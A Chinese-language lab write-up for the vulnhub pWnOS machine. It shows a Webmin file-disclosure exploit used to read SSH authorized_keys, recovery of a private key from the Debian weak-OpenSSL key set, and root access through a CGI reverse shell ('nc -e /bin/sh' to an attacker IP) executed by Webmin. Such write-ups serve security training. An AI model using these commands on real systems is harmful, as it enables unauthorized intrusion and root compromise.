pWnOS的第二种全新解法（ssh私钥破解、webmin漏洞提权）

端口

端口扫描内容请看：vulnhub（8）：pWnOS（还没信息收集就已经成功打点）-CSDN博客

打点

ssh登录公钥收集

./2017.pl 192.168.234.116 10000 /home/vmware/.ssh/authorized_keys 0
./2017.pl 192.168.234.116 10000 /home/obama/.ssh/authorized_keys 0
./2017.pl 192.168.234.116 10000 /home/osama/.ssh/authorized_keys 0
./2017.pl 192.168.234.116 10000 /home/yomama/.ssh/authorized_keys 0
​
只有vmware和obama开了私钥登录
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw== vmware@ubuntuvm
​
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ== obama@ubuntuvm

破解私钥

searchsploit prng后看到5622.txt，但是这个漏洞有条件
私钥破解需要看ssh使用的openssl的版本号，如果OpenSSL 0.9.8c-1 < 0.9.8g-9（Debian 及其衍生产品
才能使用如下漏洞破解，那么我们在如何不打点的情况下知道openssl版本呢，因为知道openssl的版本需要ssh -V显示出来，而这串字符串是硬编码文件里面的，所以我们不能通过文件披露获得openssl的版本，所以说只能尝试，因此，这是一种不可靠的尝试做法，或者说拿下目标机器后ssh -V查看版本，且匹配版本漏洞后，再破解其他用户私钥开源的私钥对做对比
​
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
​
tar vjxf 5622.tar.bz2           # 解压
​
# 目录下都是成对的私钥对：
3ff5e8afcbae87c8e5068c34afd54de5-17533.pub  7fb92ee77c941eb15a1926d097dfb555-20341      bf42c327274d75818b09c409c9c2d18e-19747.pub  fffbc8da0c715adf2b9672837aa8a807-20113
3ff6efb66496111fb2e5b16f6d55f8f1-21200      7fbd40ce4c3248dc251f09f238e2c3bc-30929      bf440475ec6be28f998e2074a00e0e1c-20388      fffbc8da0c715adf2b9672837aa8a807-20113.pub
......
​
分别对比vmware和obama
：grep -lr "AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy1"
grep -lr "AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjq"
​
发现目录有obama用户密钥对的公钥：2048/dcbe2a56e8cdea6d17495f6648329ee2-4679.pub
​
那么它的私钥就是与之成对的2048/dcbe2a56e8cdea6d17495f6648329ee2-4679

ssh登录

cp dcbe2a56e8cdea6d17495f6648329ee2-4679 /tmp/rsa
使用私钥登录
ssh obama@192.168.234.116 -oHostKeyAlgorithms=ssh-rsa,ssh-dss -i /tmp/rsa -oPubkeyAcceptedKeyTypes=ssh-rsa
​
tips：
错误：sign_and_send_pubkey: no mutual signature supported，这是因为密钥登陆阶段，客户端没有发送服务端支持公钥类型，因此密钥登陆的验证不知道用什么算法，我们手动指出即可-oPubkeyAcceptedKeyTypes=ssh-rsa，简而言之：就是服务端不知道以什么算法验证登录密钥
​
错误：Unable to negotiate with 192.168.234.116 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss，这是因为客户端主机密钥验证阶段，需要服务端host私钥签名，客户端host公钥验证服务端身份，但是客户端并没有向服务端指定hostkey的类型，服务端不知道使用什么算法签名，它提示服务端支持ssh-rsa,ssh-dss，我们手动指定即可-oHostKeyAlgorithms=ssh-rsa,ssh-dss，简而言之：就是服务端不知道以什么算法验证自己身份
​
具体ssh完整步骤且两个参数具体作用看文章：红队ssh协议通信全流程以及安全研究-CSDN博客

提权

webmin服务是按root权限进行的
​
要使用webmin服务提权，我们要思考一个问题：
如何让webmin访问且执行到我们写入的反弹shell
​
解决问题：
首先webmin服务的目录是没有任何写入权限的，我们不能把反弹shell写在webmin服务目录下，
那么不写入webmin目录，服务就访问不到反弹shell了吗？
我们可以之前使用webmin文件披露的漏洞，使用此脚本请求系统任意路径下cgi脚本时，apache会执行cgi脚本，因此我们在任意位置写入cgi脚本，就可以使用webmin服务请求并执行到cgi脚本，因为webmin使用root权限，因此反弹shell权限也是root

构造cgi文件

# cgi反弹shell
nc -e /bin/sh 192.168.234.47 1234
​
# 传给靶机

攻击者监听并请求

nc -nlvp 1234
​
让webmin服务执行cgi反弹shell
./2017.pl 192.168.234.116 10000 /home/vmware/shell3.cgi 0

结果

connect to [192.168.234.47] from (UNKNOWN) [192.168.234.116] 57598
python -c 'import pty;pty.spawn("/bin/bash")'
root@ubuntuvm:/usr/local/webmin# whomai
root
​
为何这个漏洞能够成功：
1.这个漏洞本质上是使用apache服务器对任意文件的请求，apache对其他脚本会输出，但是对cgi会解析执行
2.webmin服务使用root运行